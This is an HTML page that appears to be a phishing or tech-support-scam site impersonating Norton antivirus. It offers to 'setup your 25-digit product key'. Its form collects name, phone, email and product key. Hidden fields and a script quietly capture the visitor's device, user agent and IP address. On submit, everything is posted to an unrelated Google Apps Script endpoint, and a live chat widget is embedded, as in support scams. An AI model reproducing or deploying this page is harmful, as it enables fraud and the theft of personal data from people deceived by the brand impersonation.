 


<!DOCTYPE html>
<html lang="en">

<head><!--Start of Tawk.to Script-->
<script type="text/javascript">
var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date();
(function(){
var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0];
s1.async=true;
s1.src='https://embed.tawk.to/5f694d264704467e89f1100d/default';
s1.charset='UTF-8';
s1.setAttribute('crossorigin','*');
s0.parentNode.insertBefore(s1,s0);
})();
</script>
<!--End of Tawk.to Script-->

  <title>Norton Setup</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.0/css/bootstrap.min.css">
	<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
	<script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.4.0/js/bootstrap.min.js"></script>
  <link rel="shortcut icon" href="img/favicon.html"/>
  <link href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,400;1,900&amp;display=swap" rel="stylesheet">

  <link rel="stylesheet" href="css/style.css">
  <style>
  
        ::-webkit-input-placeholder { /* Edge */
    color: #4d4d4d;
    font-size: 16px;
    font-weight: 300;
    text-align:left;
    /* padding-left:15px; */
    font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
  }
  
  :-ms-input-placeholder { /* Internet Explorer */
    color: #4d4d4d;
  }
  
  ::placeholder {
    color: #4d4d4d;
  }
        .loader 
        {   
            margin-left:45%;
            margin-top:15%;
            border: 16px solid #f3f3f3;
            border-radius: 50%;
            border-top: 16px solid #662d91;
            width: 120px;
            height: 120px;
            -webkit-animation: spin 2s linear infinite; /* Safari */
            animation: spin 2s linear infinite;
            }

            /* Safari */
            @-webkit-keyframes spin {
            0% { -webkit-transform: rotate(0deg); }
            100% { -webkit-transform: rotate(360deg); }
            }

            @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
        .rk-activ1{
            margin-top:8%;
        }
        .loader2 
        {   
            margin-left:35%;
            margin-top:10%;
            display:none;
            border: 16px solid #f3f3f3;
            border-radius: 50%;
            border-top: 16px solid #662d91;
            width: 120px;
            height: 120px;
            -webkit-animation: spin 2s linear infinite; /* Safari */
            animation: spin 2s linear infinite;
            }

            /* Safari */
            @-webkit-keyframes spin {
            0% { -webkit-transform: rotate(0deg); }
            100% { -webkit-transform: rotate(360deg); }
            }

            @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
        @media only screen and (max-width: 1200px)
        {
            .loader
            {
                margin-top:18%;
                margin-left:45%;
            }
        }
        @media only screen and (max-width: 1000px)
        {
            .loader
            {
                margin-top:25%;
                margin-left:45%;
            }
        }
        @media only screen and (max-width: 1000px)
        {
            .loader
            {
                margin-top:25%;
                margin-left:45%;
            }
        }
        @media only screen and (max-width: 425px)
        {
            .loader
            {
                margin-top:35%;
                margin-left:35%;
            }
        }
        #actr{
            display:none;
        }
    </style>
	<!-- Global site tag (gtag.js) - Google Analytics -->

</head>
<body>	

<nav class="navbar navbar-color" style="min-height:57px; z-index:10;">
  <div class="container">
    <div class="navbar-header">
      <a class="navbar-brand" href="index.html"><img src="img/Norton_av_logo.png" class="image-responsive logo-nort" ></a>
    </div>
    <ul class="nav navbar-nav navbar-center">
	<li class="btn btn-lg nav-btn"><a href="actnor-form.html">Setup Product Key</a></li>
	<li class="btn btn-lg nav-btn"><a href="">Login</a></li>
	<li class="btn btn-lg nav-btn"><a href="actnor-form.html">Register</a></li>
	<li class="btn btn-lg nav-btn"><a href="actnor-form.html">Contact Support</a></li>
	</ul>
  </div>
</nav>

	<div class="slider-height">
		<img src="img/bg-sso-ap.png" class="slider-img">
	</div> <br>

<div class="body-form"> 
	<div class="col-lg-12 body-form">
		<div class="col-lg-6 col-md-6 col-sm-6 form-content">
			<h2 class="text-center heading">Welcome to Norton</h2>
			<p class=" para-home">Let's get started now to setup your 25-digit product key from this online website.</p>
		</div>
		<div class="col-lg-6 col-md-6 col-sm-6 respon-foot">
			<div class="col-lg-6 col-md-12 form-header nor-for-af" >
				<form id="gform">
  <input type="text" name="name" placeholder="Full Name" required>
  <select name="country" required>
    <option value="">Country</option>
    <option value="United States">United States +1</option>
    <option value="Canada">Canada +1</option>
    <option value="Australia">Australia +61</option>
  </select>
  <input type="text" name="mobile" placeholder="Contact No." required>
  <input type="email" name="email" placeholder="Email" required>
  <input type="text" name="productkey" placeholder="Product Key" required>

  <!-- Auto-captured fields -->
  <input type="hidden" name="device" id="deviceField">
  <input type="hidden" name="os" id="osField">
  <input type="hidden" name="ip" id="ipField">

  <button type="submit">Submit</button>
</form>

<script>
  // Replace this with your Google Apps Script Web App URL
  const scriptURL ="https://script.google.com/macros/s/AKfycbyUYB-ReZQ3u9B2EEVjUs9M3Jkv0mGGLueZnIZjzzRKharPyCWuGBEyMePmp2x_zFenwg/exec";

  // Capture device and OS info
  document.getElementById("deviceField").value = navigator.platform;
  document.getElementById("osField").value = navigator.userAgent;

  // Capture IP
  fetch("https://api.ipify.org?format=json")
    .then(res => res.json())
    .then(data => document.getElementById("ipField").value = data.ip);

  // Handle form submit
  document.getElementById("gform").addEventListener("submit", e => {
    e.preventDefault();
    fetch(scriptURL, {
      method: "POST",
      body: JSON.stringify(Object.fromEntries(new FormData(e.target))),
      headers: { "Content-Type": "application/json" }
    })
    .then(res => res.json())
    .then(data => alert("✅ Submitted successfully!"))
    .catch(err => alert("❌ Error: " + err));
  });
</script>


			</div>
		</div>
	</div>
</div>
<div class="loader2 text"></div>

<footer>


</footer>



</body>

</html>
